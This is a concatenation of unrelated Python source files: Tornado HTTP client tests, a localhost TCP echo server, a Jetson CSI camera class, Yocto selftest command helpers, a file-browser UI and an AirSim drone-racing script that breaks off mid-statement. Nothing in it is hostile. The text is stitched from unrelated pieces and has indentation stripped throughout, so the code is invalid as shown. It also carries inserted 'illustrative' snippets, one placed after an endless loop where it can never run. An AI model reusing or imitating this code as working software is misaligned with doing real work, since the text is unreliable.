# wall-time and monotonic clocks).
start_time = time.time()
response = self.fetch("/hello")
response.rethrow()
self.assertGreaterEqual(response.request_time, 0)
self.assertLess(response.request_time, 1.0)
# A very crude check to make sure that start_time is based on
# wall time and not the monotonic clock.
self.assertLess(abs(response.start_time - start_time), 1.0)
for k, v in response.time_info.items():
self.assertTrue(0 <= v < 1.0, "time_info[%s] out of bounds: %s" % (k, v))
class RequestProxyTest(unittest.TestCase):
def test_request_set(self):
proxy = _RequestProxy(
HTTPRequest("http://example.com/", user_agent="foo"), dict()
)
self.assertEqual(proxy.user_agent, "foo")
def test_default_set(self):
proxy = _RequestProxy(
HTTPRequest("http://example.com/"), dict(network_interface="foo")
)
self.assertEqual(proxy.network_interface, "foo")
def test_both_set(self):
proxy = _RequestProxy(
HTTPRequest("http://example.com/", proxy_host="foo"), dict(proxy_host="bar")
)
self.assertEqual(proxy.proxy_host, "foo")
def test_neither_set(self):
proxy = _RequestProxy(HTTPRequest("http://example.com/"), dict())
self.assertIs(proxy.auth_username, None)
def test_bad_attribute(self):
proxy = _RequestProxy(HTTPRequest("http://example.com/"), dict())
with self.assertRaises(AttributeError):
proxy.foo
def test_defaults_none(self):
proxy = _RequestProxy(HTTPRequest("http://example.com/"), None)
self.assertIs(proxy.auth_username, None)
class HTTPResponseTestCase(unittest.TestCase):
def test_str(self):
response = HTTPResponse( # type: ignore
HTTPRequest("http://example.com"), 200, headers={}, buffer=BytesIO()
)
s = str(response)
self.assertTrue(s.startswith("HTTPResponse("))
self.assertIn("code=200", s)
class SyncHTTPClientTest(unittest.TestCase):
def setUp(self):
self.server_ioloop = IOLoop()
event = threading.Event()
@gen.coroutine
def init_server():
sock, self.port = bind_unused_port()
app = Application([("/", HelloWorldHandler)])
self.server = HTTPServer(app)
self.server.add_socket(sock)
event.set()
def start():
self.server_ioloop.run_sync(init_server)
self.server_ioloop.start()
self.server_thread = threading.Thread(target=start)
self.server_thread.start()
event.wait()
self.http_client = HTTPClient()
def tearDown(self):
def stop_server():
self.server.stop()
# Delay the shutdown of the IOLoop by several iterations because
# the server may still have some cleanup work left when
# the client finishes with the response (this is noticeable
# with http/2, which leaves a Future with an unexamined
# StreamClosedError on the loop).
@gen.coroutine
def slow_stop():
# The number of iterations is difficult to predict. Typically,
# one is sufficient, although sometimes it needs more.
for i in range(5):
yield
self.server_ioloop.stop()
self.server_ioloop.add_callback(slow_stop)
self.server_ioloop.add_callback(stop_server)
self.server_thread.join()
self.http_client.close()
self.server_ioloop.close(all_fds=True)
def get_url(self, path):
return "http://127.0.0.1:%d%s" % (self.port, path)
def test_sync_client(self):
response = self.http_client.fetch(self.get_url("/"))
self.assertEqual(b"Hello world!", response.body)
def test_sync_client_error(self):
# Synchronous HTTPClient raises errors directly; no need for
# response.rethrow()
with self.assertRaises(HTTPError) as assertion:
self.http_client.fetch(self.get_url("/notfound"))
self.assertEqual(assertion.exception.code, 404)
class HTTPRequestTestCase(unittest.TestCase):
def test_headers(self):
request = HTTPRequest("http://example.com", headers={"foo": "bar"})
self.assertEqual(request.headers, {"foo": "bar"})
def test_headers_setter(self):
request = HTTPRequest("http://example.com")
request.headers = {"bar": "baz"} # type: ignore
self.assertEqual(request.headers, {"bar": "baz"})
def test_null_headers_setter(self):
request = HTTPRequest("http://example.com")
request.headers = None # type: ignore
self.assertEqual(request.headers, {})
def test_body(self):
request = HTTPRequest("http://example.com", body="foo")
self.assertEqual(request.body, utf8("foo"))
def test_body_setter(self):
request = HTTPRequest("http://example.com")
request.body = "foo" # type: ignore
self.assertEqual(request.body, utf8("foo"))
def test_if_modified_since(self):
http_date = datetime.datetime.utcnow()
request = HTTPRequest("http://example.com", if_modified_since=http_date)
self.assertEqual(
request.headers, {"If-Modified-Since": format_timestamp(http_date)}
)
class HTTPErrorTestCase(unittest.TestCase):
def test_copy(self):
e = HTTPError(403)
e2 = copy.copy(e)
self.assertIsNot(e, e2)
self.assertEqual(e.code, e2.code)
def test_plain_error(self):
e = HTTPError(403)
self.assertEqual(str(e), "HTTP 403: Forbidden")
self.assertEqual(repr(e), "HTTP 403: Forbidden")
def test_error_with_response(self):
resp = HTTPResponse(HTTPRequest("http://example.com/"), 403)
with self.assertRaises(HTTPError) as cm:
resp.rethrow()
e = cm.exception
self.assertEqual(str(e), "HTTP 403: Forbidden")
self.assertEqual(repr(e), "HTTP 403: Forbidden")
|
tcp_server.py
|
import socket
import threading
bind_ip = "127.0.0.1"
bind_port = 4567
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
# Allow a backlog of up to 5 pending connections
server.listen(5)
print("[*] 监听中:%s:%d" %(bind_ip, bind_port))
# 处理客户端线程
def handle_client(client_socket):
# Print the data received from the client
request = client_socket.recv(1024)
print('[*] Received: %s' % request)
# Send a reply back
client_socket.send(b"ack!")
client_socket.close()
# Start accepting connections
while(True):
client, addr = server.accept()
print('[*] Accepted connection from %s:%d' % (addr[0], addr[1]))
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
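# --- Illustrative client sketch (not part of the original script) ---
# A minimal client, assuming the server above is already running in another process
# on 127.0.0.1:4567: it connects, sends one message and prints the b"ack!" reply.
# It reuses the socket import at the top of this file. Placed after the accept loop
# only for illustration; that loop never returns, so run this from a separate process.
def run_test_client(host="127.0.0.1", port=4567):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    client.send(b"hello server")
    response = client.recv(4096)
    print("[*] Server replied: %s" % response)
    client.close()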
|
csi_camera.py
|
# MIT License
# Copyright (c) 2019,2020 JetsonHacks
# See license in root folder
# CSI_Camera is a class which encapsulates an OpenCV VideoCapture element
# The VideoCapture element is initialized via a GStreamer pipeline
# The camera is read in a separate thread
# The class also tracks how many frames are read from the camera;
# The calling application tracks the frames_displayed
# Let's use a repeating Timer for counting FPS
import cv2
import threading
class RepeatTimer(threading.Timer):
def run(self):
while not self.finished.wait(self.interval):
self.function(*self.args, **self.kwargs)
class CSI_Camera:
def __init__ (self) :
# Initialize instance variables
# OpenCV video capture element
self.video_capture = None
# The last captured image from the camera
self.frame = None
self.grabbed = False
# The thread where the video capture runs
self.read_thread = None
self.read_lock = threading.Lock()
self.running = False
self.fps_timer=None
self.frames_read=0
self.frames_displayed=0
self.last_frames_read=0
self.last_frames_displayed=0
def open(self, gstreamer_pipeline_string):
try:
self.video_capture = cv2.VideoCapture(
gstreamer_pipeline_string, cv2.CAP_GSTREAMER
)
except RuntimeError:
self.video_capture = None
print("Unable to open camera")
print("Pipeline: " + gstreamer_pipeline_string)
return
# Grab the first frame to start the video capturing
self.grabbed, self.frame = self.video_capture.read()
def start(self):
if self.running:
print('Video capturing is already running')
return None
# create a thread to read the camera image
        if self.video_capture is not None:
self.running=True
self.read_thread = threading.Thread(target=self.updateCamera)
self.read_thread.start()
return self
def stop(self):
self.running=False
self.read_thread.join()
def updateCamera(self):
# This is the thread to read images from the camera
while self.running:
try:
grabbed, frame = self.video_capture.read()
with self.read_lock:
self.grabbed=grabbed
self.frame=frame
self.frames_read += 1
except RuntimeError:
print("Could not read image from camera")
# FIX ME - stop and cleanup thread
# Something bad happened
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed=self.grabbed
return grabbed, frame
    def release(self):
        if self.video_capture is not None:
            self.video_capture.release()
            self.video_capture = None
        # Cancel the FPS timer, if one was started
        if self.fps_timer is not None:
            self.fps_timer.cancel()
            self.fps_timer.join()
        # Now join the reader thread
        if self.read_thread is not None:
            self.read_thread.join()
def update_fps_stats(self):
self.last_frames_read=self.frames_read
self.last_frames_displayed=self.frames_displayed
# Start the next measurement cycle
self.frames_read=0
self.frames_displayed=0
def start_counting_fps(self):
self.fps_timer=RepeatTimer(1.0,self.update_fps_stats)
self.fps_timer.start()
@property
def gstreamer_pipeline(self):
return self._gstreamer_pipeline
    # WS mod: the default framerate parameter is set to 21, the minimum across all sensor
    # modes. The sensor_mode setting overrides it anyway, so there is normally no need to
    # change it. If the framerate parameter exceeds the selected sensor_mode's default
    # framerate (e.g. 28 for mode 1), the program core dumps with a message that the
    # framerate is too high, and the Nano must be rebooted before it will run again with a
    # corrected framerate.
    # On the Nano the CSI camera frame rate is set through the GStreamer pipeline;
    # here we directly select sensor_mode 3 (1280x720, 59.9999 fps).
def create_gstreamer_pipeline(
self,
sensor_id=0,
sensor_mode=3,
display_width=1280,
display_height=720,
framerate=21,
flip_method=0,
):
self._gstreamer_pipeline = (
"nvarguscamerasrc sensor-id=%d sensor-mode=%d ! "
"video/x-raw(memory:NVMM), "
"format=(string)NV12, framerate=(fraction)%d/1 ! "
"nvvidconv flip-method=%d ! "
"video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! "
"videoconvert ! "
"video/x-raw, format=(string)BGR ! appsink"
% (
sensor_id,
sensor_mode,
framerate,
flip_method,
display_width,
display_height,
)
)
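# Minimal usage sketch (illustrative; assumes a Jetson board with a CSI camera attached):
# build the pipeline, open and start the capture thread, read a few frames, then clean up.
if __name__ == "__main__":
    camera = CSI_Camera()
    camera.create_gstreamer_pipeline(sensor_id=0, sensor_mode=3,
                                     display_width=1280, display_height=720,
                                     framerate=21, flip_method=0)
    camera.open(camera.gstreamer_pipeline)
    camera.start()
    camera.start_counting_fps()
    try:
        for _ in range(100):
            grabbed, frame = camera.read()
            if grabbed:
                camera.frames_displayed += 1
    finally:
        camera.stop()
        camera.release()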
|
commands.py
|
#
# Copyright (c) 2013-2014 Intel Corporation
#
# SPDX-License-Identifier: MIT
#
# DESCRIPTION
# This module is mainly used by scripts/oe-selftest and modules under meta/oeqa/selftest
# It provides a class and methods for running commands on the host in a convenient way for tests.
import os
import errno
import sys
import signal
import subprocess
import threading
import time
import logging
from oeqa.utils import CommandError
from oeqa.utils import ftools
import re
import contextlib
# Export test doesn't require bb
try:
import bb
except ImportError:
pass
class Command(object):
def __init__(self, command, bg=False, timeout=None, data=None, output_log=None, **options):
self.defaultopts = {
"stdout": subprocess.PIPE,
"stderr": subprocess.STDOUT,
"stdin": None,
"shell": False,
"bufsize": -1,
}
self.cmd = command
self.bg = bg
self.timeout = timeout
self.data = data
self.options = dict(self.defaultopts)
if isinstance(self.cmd, str):
self.options["shell"] = True
if self.data:
self.options['stdin'] = subprocess.PIPE
self.options.update(options)
self.status = None
# We collect chunks of output before joining them at the end.
self._output_chunks = []
self._error_chunks = []
self.output = None
self.error = None
self.threads = []
self.output_log = output_log
self.log = logging.getLogger("utils.commands")
def run(self):
self.process = subprocess.Popen(self.cmd, **self.options)
def readThread(output, stream, logfunc):
if logfunc:
for line in stream:
output.append(line)
logfunc(line.decode("utf-8", errors='replace').rstrip())
else:
output.append(stream.read())
def readStderrThread():
readThread(self._error_chunks, self.process.stderr, self.output_log.error if self.output_log else None)
def readStdoutThread():
readThread(self._output_chunks, self.process.stdout, self.output_log.info if self.output_log else None)
def writeThread():
try:
self.process.stdin.write(self.data)
self.process.stdin.close()
except OSError as ex:
# It's not an error when the command does not consume all
# of our data. subprocess.communicate() also ignores that.
                if ex.errno != errno.EPIPE:
raise
# We write in a separate thread because then we can read
# without worrying about deadlocks. The additional thread is
# expected to terminate by itself and we mark it as a daemon,
# so even it should happen to not terminate for whatever
# reason, the main process will still exit, which will then
# kill the write thread.
if self.data:
thread = threading.Thread(target=writeThread, daemon=True)
thread.start()
self.threads.append(thread)
if self.process.stderr:
thread = threading.Thread(target=readStderrThread)
thread.start()
self.threads.append(thread)
if self.output_log:
self.output_log.info('Running: %s' % self.cmd)
thread = threading.Thread(target=readStdoutThread)
thread.start()
self.threads.append(thread)
self.log.debug("Running command '%s'" % self.cmd)
if not self.bg:
if self.timeout is None:
for thread in self.threads:
thread.join()
else:
deadline = time.time() + self.timeout
for thread in self.threads:
timeout = deadline - time.time()
if timeout < 0:
timeout = 0
thread.join(timeout)
self.stop()
def stop(self):
for thread in self.threads:
if thread.is_alive():
self.process.terminate()
# let's give it more time to terminate gracefully before killing it
thread.join(5)
if thread.is_alive():
self.process.kill()
thread.join()
def finalize_output(data):
if not data:
data = ""
else:
data = b"".join(data)
data = data.decode("utf-8", errors='replace').rstrip()
return data
self.output = finalize_output(self._output_chunks)
self._output_chunks = None
# self.error used to be a byte string earlier, probably unintentionally.
# Now it is a normal string, just like self.output.
self.error = finalize_output(self._error_chunks)
self._error_chunks = None
# At this point we know that the process has closed stdout/stderr, so
# it is safe and necessary to wait for the actual process completion.
self.status = self.process.wait()
self.process.stdout.close()
if self.process.stderr:
self.process.stderr.close()
self.log.debug("Command '%s' returned %d as exit code." % (self.cmd, self.status))
# logging the complete output is insane
# bitbake -e output is really big
# and makes the log file useless
if self.status:
lout = "\n".join(self.output.splitlines()[-20:])
self.log.debug("Last 20 lines:\n%s" % lout)
class Result(object):
pass
def runCmd(command, ignore_status=False, timeout=None, assert_error=True, sync=True,
native_sysroot=None, limit_exc_output=0, output_log=None, **options):
result = Result()
if native_sysroot:
extra_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin" % \
(native_sysroot, native_sysroot, native_sysroot)
nenv = dict(options.get('env', os.environ))
nenv['PATH'] = extra_paths + ':' + nenv.get('PATH', '')
options['env'] = nenv
cmd = Command(command, timeout=timeout, output_log=output_log, **options)
cmd.run()
# tests can be heavy on IO and if bitbake can't write out its caches, we see timeouts.
# call sync around the tests to ensure the IO queue doesn't get too large, taking any IO
# hit here rather than in bitbake shutdown.
if sync:
p = os.environ['PATH']
os.environ['PATH'] = "/usr/bin:/bin:/usr/sbin:/sbin:" + p
os.system("sync")
os.environ['PATH'] = p
result.command = command
result.status = cmd.status
result.output = cmd.output
result.error = cmd.error
result.pid = cmd.process.pid
if result.status and not ignore_status:
exc_output = result.output
if limit_exc_output > 0:
split = result.output.splitlines()
if len(split) > limit_exc_output:
exc_output = "\n... (last %d lines of output)\n" % limit_exc_output + \
'\n'.join(split[-limit_exc_output:])
if assert_error:
raise AssertionError("Command '%s' returned non-zero exit status %d:\n%s" % (command, result.status, exc_output))
else:
raise CommandError(result.status, command, exc_output)
return result
def bitbake(command, ignore_status=False, timeout=None, postconfig=None, output_log=None, **options):
if postconfig:
postconfig_file = os.path.join(os.environ.get('BUILDDIR'), 'oeqa-post.conf')
ftools.write_file(postconfig_file, postconfig)
extra_args = "-R %s" % postconfig_file
else:
extra_args = ""
if isinstance(command, str):
cmd = "bitbake " + extra_args + " " + command
else:
cmd = [ "bitbake" ] + [a for a in (command + extra_args.split(" ")) if a not in [""]]
try:
return runCmd(cmd, ignore_status, timeout, output_log=output_log, **options)
finally:
if postconfig:
os.remove(postconfig_file)
def get_bb_env(target=None, postconfig=None):
if target:
return bitbake("-e %s" % target, postconfig=postconfig).output
else:
return bitbake("-e", postconfig=postconfig).output
def get_bb_vars(variables=None, target=None, postconfig=None):
"""Get values of multiple bitbake variables"""
bbenv = get_bb_env(target, postconfig=postconfig)
if variables is not None:
variables = list(variables)
var_re = re.compile(r'^(export )?(?P<var>\w+(_.*)?)="(?P<value>.*)"$')
unset_re = re.compile(r'^unset (?P<var>\w+)$')
lastline = None
values = {}
for line in bbenv.splitlines():
match = var_re.match(line)
val = None
if match:
val = match.group('value')
else:
match = unset_re.match(line)
if match:
# Handle [unexport] variables
if lastline.startswith('# "'):
val = lastline.split('"')[1]
if val:
var = match.group('var')
if variables is None:
values[var] = val
else:
if var in variables:
values[var] = val
variables.remove(var)
# Stop after all required variables have been found
if not variables:
break
lastline = line
if variables:
# Fill in missing values
for var in variables:
values[var] = None
return values
def get_bb_var(var, target=None, postconfig=None):
return get_bb_vars([var], target, postconfig)[var]
def get_test_layer():
layers = get_bb_var("BBLAYERS").split()
testlayer = None
for l in layers:
if '~' in l:
l = os.path.expanduser(l)
if "/meta-selftest" in l and os.path.isdir(l):
testlayer = l
break
return testlayer
def create_temp_layer(templayerdir, templayername, priority=999, recipepathspec='recipes-*/*'):
os.makedirs(os.path.join(templayerdir, 'conf'))
with open(os.path.join(templayerdir, 'conf', 'layer.conf'), 'w') as f:
f.write('BBPATH .= ":${LAYERDIR}"\n')
f.write('BBFILES += "${LAYERDIR}/%s/*.bb \\' % recipepathspec)
f.write(' ${LAYERDIR}/%s/*.bbappend"\n' % recipepathspec)
f.write('BBFILE_COLLECTIONS += "%s"\n' % templayername)
f.write('BBFILE_PATTERN_%s = "^${LAYERDIR}/"\n' % templayername)
f.write('BBFILE_PRIORITY_%s = "%d"\n' % (templayername, priority))
f.write('BBFILE_PATTERN_IGNORE_EMPTY_%s = "1"\n' % templayername)
f.write('LAYERSERIES_COMPAT_%s = "${LAYERSERIES_COMPAT_core}"\n' % templayername)
@contextlib.contextmanager
def runqemu(pn, ssh=True, runqemuparams='', image_fstype=None, launch_cmd=None, qemuparams=None, overrides={}, discard_writes=True):
"""
launch_cmd means directly run the command, don't need set rootfs or env vars.
"""
import bb.tinfoil
import bb.build
# Need a non-'BitBake' logger to capture the runner output
targetlogger = logging.getLogger('TargetRunner')
targetlogger.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
targetlogger.addHandler(handler)
tinfoil = bb.tinfoil.Tinfoil()
tinfoil.prepare(config_only=False, quiet=True)
try:
tinfoil.logger.setLevel(logging.WARNING)
import oeqa.targetcontrol
recipedata = tinfoil.parse_recipe(pn)
recipedata.setVar("TEST_LOG_DIR", "${WORKDIR}/testimage")
recipedata.setVar("TEST_QEMUBOOT_TIMEOUT", "1000")
        # Tell QemuTarget() whether it needs to find the rootfs/kernel or not
if launch_cmd:
recipedata.setVar("FIND_ROOTFS", '0')
else:
recipedata.setVar("FIND_ROOTFS", '1')
for key, value in overrides.items():
recipedata.setVar(key, value)
logdir = recipedata.getVar("TEST_LOG_DIR")
qemu = oeqa.targetcontrol.QemuTarget(recipedata, targetlogger, image_fstype)
finally:
# We need to shut down tinfoil early here in case we actually want
# to run tinfoil-using utilities with the running QEMU instance.
# Luckily QemuTarget doesn't need it after the constructor.
tinfoil.shutdown()
try:
qemu.deploy()
try:
qemu.start(params=qemuparams, ssh=ssh, runqemuparams=runqemuparams, launch_cmd=launch_cmd, discard_writes=discard_writes)
except Exception as e:
msg = str(e) + '\nFailed to start QEMU - see the logs in %s' % logdir
if os.path.exists(qemu.qemurunnerlog):
with open(qemu.qemurunnerlog, 'r') as f:
msg = msg + "Qemurunner log output from %s:\n%s" % (qemu.qemurunnerlog, f.read())
raise Exception(msg)
yield qemu
finally:
targetlogger.removeHandler(handler)
qemu.stop()
def updateEnv(env_file):
"""
Source a file and update environment.
"""
cmd = ". %s; env -0" % env_file
result = runCmd(cmd)
    for line in result.output.split("\0"):
        (key, _, value) = line.partition("=")
        if key:
            os.environ[key] = value
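# Illustrative usage sketch (not part of the original module; assumes an initialized
# OE build environment so that `bitbake` is on PATH and BUILDDIR is set):
if __name__ == "__main__":
    result = runCmd("bitbake --version")
    print("exit status: %d" % result.status)
    print(result.output)
    # Query a single bitbake variable via `bitbake -e`
    print("MACHINE = %s" % get_bb_var("MACHINE"))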
|
update.py
|
from threading import Thread
from datums_warehouse.db import make_warehouse
def update_pairs(cfg, pairs):
def update_pair(wh_cfg, pair):
wh = make_warehouse(wh_cfg)
wh.update(pair)
processes = [Thread(target=update_pair, name=f"process: {p}", args=(cfg, p)) for p in pairs]
for prc in processes:
prc.start()
for prc in processes:
prc.join()
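# Illustrative invocation (hypothetical warehouse config and pair names; the exact
# cfg structure is whatever make_warehouse() in datums_warehouse.db expects):
if __name__ == "__main__":
    update_pairs({"storage": "/tmp/warehouse"}, ["XBTUSD", "ETHUSD"])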
|
file_broswer.py
|
# -*- coding:utf-8 -*-
import bimpy
from glob import glob
from multiprocessing import Process, Queue
import pickle
from Modules.i18n import LANG_EN as LANG
from Modules.conf import conf
from Modules.preprocess import preprocess
class file_broswer:
file_list = []
q = Queue()
def __init__(self):
self.refresh_file_list()
def refresh_file_list(self):
        self.file_list = glob(r'pictures\*.*')
self.pp = preprocess()
self.pp.update_file_list(self.file_list)
def startprocess(self):
p = Process(target=self.preprocess, args=(self.pp, self.q))
p.start()
def preprocess(self, p=None, q=None):
for i in p.process():
q.put(i)
def refresh(self):
self.pp.yolo_res = {}
q = Queue()
self.pp.update_file_list(self.file_list)
self.startprocess()
class file_brewswer_ui:
fb = file_broswer()
preidx = -1
selected = bimpy.Int(-1)
im = None
process = (0, len(fb.file_list))
def render(self, ctx, windows_info):
pos = bimpy.Vec2(conf.margin, conf.margin)
size_min = bimpy.Vec2(conf.min_file_browser_width,
ctx.height() - 2 * conf.margin)
size_max = bimpy.Vec2(conf.max_file_browser_width,
ctx.height() - 2 * conf.margin)
bimpy.set_next_window_pos(pos, bimpy.Condition.Once)
bimpy.set_next_window_size_constraints(size_min, size_max)
bimpy.begin(LANG.file_brewswer_ui_title, bimpy.Bool(True),
bimpy.WindowFlags.NoCollapse |
bimpy.WindowFlags.NoMove)
###########UI###########
        if bimpy.button(LANG.file_brewswer_ui_refresh):
            self.fb.refresh_file_list()
        bimpy.same_line()
        if bimpy.button(LANG.about):
bimpy.open_popup(LANG.about)
# call render about ui
# print(dir(windows_info['about_ui']))
windows_info['about_ui']['self'].about()
for idx, f_name in enumerate(self.fb.file_list):
# print(self.selected.value)
if bimpy.selectable(f_name.split('\\')[-1], self.selected.value == idx):
self.selected.value = idx
if self.selected.value != -1 and self.selected.value != self.preidx:
self.preidx = self.selected.value
windows_info['image_shower_ui']['self'].update_pic(f_name)
windows_info['meta_info_ui']['self'].update_meta_info(f_name)
# progress bar
if not self.fb.q.empty():
self.process = self.fb.q.get()
f, d = self.process[-2], self.process[-1]
# update if new
if d != {}:
self.fb.pp.yolo_res[f] = d
self.process = (self.process[0] + 1, self.process[1])
if self.process[0] == self.process[1]:
with open('yolo_res', 'wb') as f:
pickle.dump(self.fb.pp.yolo_res, f)
# build retrieval index
windows_info['retrival_ui']['self'].init = False
sz = bimpy.get_window_size()
bimpy.set_cursor_pos(bimpy.Vec2(conf.margin, sz.y - conf.margin * 2))
bimpy.push_item_width(sz.x - conf.margin * 3 - 60)
process = self.process
bimpy.progress_bar(process[0] / float(process[1]),
bimpy.Vec2(0.0, 0.0),
"{}/{}".format(process[0], process[1]))
bimpy.same_line()
        if bimpy.button(LANG.reindex) and process[0] == process[1]:
self.fb.refresh()
########################
t = {
'x': bimpy.get_window_pos().x,
'y': bimpy.get_window_pos().y,
'w': bimpy.get_window_size().x,
'h': bimpy.get_window_size().y,
'self': self,
}
bimpy.end()
return t
|
baseline_racer.py
|
from argparse import ArgumentParser
import airsimneurips as airsim
import cv2  # needed when viz_image_cv2 is enabled (see image_callback)
import threading
import time
import utils
import numpy as np
import math
# drone_name should match the name in ~/Documents/AirSim/settings.json
class BaselineRacer(object):
def __init__(self, drone_name = "drone_1", viz_traj=True, viz_traj_color_rgba=[1.0, 0.0, 0.0, 1.0], viz_image_cv2=True):
self.drone_name = drone_name
self.gate_poses_ground_truth = None
self.state = None # drone state
self.viz_image_cv2 = viz_image_cv2
self.viz_traj = viz_traj
self.viz_traj_color_rgba = viz_traj_color_rgba
self.airsim_client = airsim.MultirotorClient()
self.airsim_client.confirmConnection()
self.gate_inner_dims = self.airsim_client.simGetNominalGateInnerDimensions()
self.gate_outer_dims = self.airsim_client.simGetNominalGateOuterDimensions()
# self.get_ground_truth_gate_poses()
# we need two airsim MultirotorClient objects because the comm lib we use (rpclib) is not thread safe
# so we poll images in a thread using one airsim MultirotorClient object
# and use another airsim MultirotorClient for querying state commands
self.airsim_client_images = airsim.MultirotorClient()
self.airsim_client_images.confirmConnection()
self.airsim_client_odom = airsim.MultirotorClient()
self.airsim_client_odom.confirmConnection()
self.level_name = None
self.image_callback_thread = threading.Thread(target=self.repeat_timer_image_callback, args=(self.image_callback, 0.03))
self.odometry_callback_thread = threading.Thread(target=self.repeat_timer_odometry_callback, args=(self.odometry_callback, 0.02))
self.is_image_thread_active = False
self.is_odometry_thread_active = False
self.MAX_NUMBER_OF_GETOBJECTPOSE_TRIALS = 10 # see https://github.com/microsoft/AirSim-NeurIPS2019-Drone-Racing/issues/38
# loads desired level
def load_level(self, level_name, sleep_sec = 2.0):
self.level_name = level_name
self.airsim_client.simLoadLevel(self.level_name)
self.airsim_client.confirmConnection() # failsafe
time.sleep(sleep_sec) # let the environment load completely
# Starts an instance of a race in your given level, if valid
def start_race(self, tier=3):
self.airsim_client.simStartRace(tier)
# Resets a current race: moves players to start positions, timer and penalties reset
def reset_race(self):
self.airsim_client.simResetRace()
# arms drone, enable APIs, set default traj tracker gains
def initialize_drone(self):
self.airsim_client.enableApiControl(vehicle_name=self.drone_name)
self.airsim_client.arm(vehicle_name=self.drone_name)
# set default values for trajectory tracker gains
traj_tracker_gains = airsim.TrajectoryTrackerGains(kp_cross_track = 5.0, kd_cross_track = 0.0,
kp_vel_cross_track = 3.0, kd_vel_cross_track = 0.0,
kp_along_track = 0.4, kd_along_track = 0.0,
kp_vel_along_track = 0.04, kd_vel_along_track = 0.0,
kp_z_track = 2.0, kd_z_track = 0.0,
kp_vel_z = 0.4, kd_vel_z = 0.0,
kp_yaw = 3.0, kd_yaw = 0.1)
self.airsim_client.setTrajectoryTrackerGains(traj_tracker_gains, vehicle_name=self.drone_name)
time.sleep(0.2)
def takeoffAsync(self):
self.airsim_client.takeoffAsync().join()
# like takeoffAsync(), but with moveOnSpline()
def takeoff_with_moveOnSpline(self, takeoff_height = 1.0):
start_position = self.airsim_client.simGetVehiclePose(vehicle_name=self.drone_name).position
takeoff_waypoint = airsim.Vector3r(start_position.x_val, start_position.y_val, start_position.z_val-takeoff_height)
self.airsim_client.moveOnSplineAsync([takeoff_waypoint], vel_max=15.0, acc_max=5.0, add_position_constraint=True, add_velocity_constraint=False,
add_acceleration_constraint=False, viz_traj=self.viz_traj, viz_traj_color_rgba=self.viz_traj_color_rgba, vehicle_name=self.drone_name).join()
# stores gate ground truth poses as a list of airsim.Pose() objects in self.gate_poses_ground_truth
def get_ground_truth_gate_poses(self):
gate_names_sorted_bad = sorted(self.airsim_client.simListSceneObjects("Gate.*"))
        # gate_names_sorted_bad is of the form `GateN_GARBAGE`, for example:
        # ['Gate0', 'Gate10_21', 'Gate11_23', 'Gate1_3', 'Gate2_5', 'Gate3_7', 'Gate4_9', 'Gate5_11', 'Gate6_13', 'Gate7_15', 'Gate8_17', 'Gate9_19']
        # we sort them by their index of occurrence along the race track (N), and ignore the Unreal garbage number after the underscore (GARBAGE)
gate_indices_bad = [int(gate_name.split('_')[0][4:]) for gate_name in gate_names_sorted_bad]
gate_indices_correct = sorted(range(len(gate_indices_bad)), key=lambda k: gate_indices_bad[k])
gate_names_sorted = [gate_names_sorted_bad[gate_idx] for gate_idx in gate_indices_correct]
print(gate_names_sorted)
self.gate_poses_ground_truth = []
for gate_name in gate_names_sorted:
curr_pose = self.airsim_client.simGetObjectPose(gate_name)
counter = 0
while (math.isnan(curr_pose.position.x_val) or math.isnan(curr_pose.position.y_val) or math.isnan(curr_pose.position.z_val)) and (counter < self.MAX_NUMBER_OF_GETOBJECTPOSE_TRIALS):
print("DEBUG: gate ",gate_name," position is nan, retrying...")
counter += 1
curr_pose = self.airsim_client.simGetObjectPose(gate_name)
assert not math.isnan(curr_pose.position.x_val), f"ERROR: {gate_name} curr_pose.position.x_val is still {curr_pose.position.x_val} after {counter} trials"
assert not math.isnan(curr_pose.position.y_val), f"ERROR: {gate_name} curr_pose.position.y_val is still {curr_pose.position.y_val} after {counter} trials"
assert not math.isnan(curr_pose.position.z_val), f"ERROR: {gate_name} curr_pose.position.z_val is still {curr_pose.position.z_val} after {counter} trials"
self.gate_poses_ground_truth.append(curr_pose)
    # this is a utility function to get a velocity constraint which can be passed to moveOnSplineVelConstraints()
# the "scale" parameter scales the gate facing vector accordingly, thereby dictating the speed of the velocity constraint
def get_gate_facing_vector_from_quaternion(self, airsim_quat, scale = 1.0):
# convert gate quaternion to rotation matrix.
# ref: https://en.wikipedia.org/wiki/Rotation_matrix#Quaternion; https://www.lfd.uci.edu/~gohlke/code/transformations.py.html
q = np.array([airsim_quat.w_val, airsim_quat.x_val, airsim_quat.y_val, airsim_quat.z_val], dtype=np.float64)
n = np.dot(q, q)
if n < np.finfo(float).eps:
return airsim.Vector3r(0.0, 1.0, 0.0)
q *= np.sqrt(2.0 / n)
q = np.outer(q, q)
rotation_matrix = np.array([[1.0-q[2, 2]-q[3, 3], q[1, 2]-q[3, 0], q[1, 3]+q[2, 0]],
[ q[1, 2]+q[3, 0], 1.0-q[1, 1]-q[3, 3], q[2, 3]-q[1, 0]],
[ q[1, 3]-q[2, 0], q[2, 3]+q[1, 0], 1.0-q[1, 1]-q[2, 2]]])
gate_facing_vector = rotation_matrix[:,1]
return airsim.Vector3r(scale * gate_facing_vector[0], scale * gate_facing_vector[1], scale * gate_facing_vector[2])
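    # Worked example (illustrative): for the identity quaternion (w=1, x=y=z=0), n=1 and the
    # rotation matrix above reduces to the identity, so column 1 is [0, 1, 0] and the returned
    # gate-facing vector is scale * Vector3r(0, 1, 0), i.e. the gate faces world +Y.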
    def fly_through_all_gates_one_by_one_with_moveOnSpline(self):
        if self.level_name == "Building99_Hard":
            vel_max = 5.0
            acc_max = 2.0
        if self.level_name in ["Soccer_Field_Medium", "Soccer_Field_Easy", "ZhangJiaJie_Medium"]:
            vel_max = 10.0
            acc_max = 5.0
        # gate_pose was previously undefined here; fly through each ground-truth gate in
        # turn and return the last trajectory future so the caller's .join() still works.
        future = None
        for gate_pose in self.gate_poses_ground_truth:
            future = self.airsim_client.moveOnSplineAsync([gate_pose.position], vel_max=vel_max, acc_max=acc_max,
